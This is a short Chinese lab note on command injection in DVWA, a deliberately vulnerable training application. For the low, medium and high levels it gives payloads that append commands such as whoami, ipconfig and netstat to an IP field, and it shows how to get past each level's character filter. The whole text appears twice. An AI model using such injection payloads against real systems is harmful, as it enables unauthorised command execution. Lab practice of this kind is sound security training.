DVWA-命令执行漏洞
低
没有进行任何过滤,可以直接在后面拼接命令
127.0.0.1&&ipconfig
127.0.0.1&&whoami
中
可见过滤了&&和;
127.0.0.1&ipconfig
127.0.0.1|dir
高
可见过滤了一系列字符,但是"|"中有一个空格,可以借此绕过
127.0.0.1|ipconfig
127.0.0.1|netstat
低
没有进行任何过滤,可以直接在后面拼接命令
127.0.0.1&&ipconfig
127.0.0.1&&whoami
中
可见过滤了&&和;
127.0.0.1&ipconfig
127.0.0.1|dir
高
可见过滤了一系列字符,但是"|"中有一个空格,可以借此绕过
127.0.0.1|ipconfig
127.0.0.1|netstat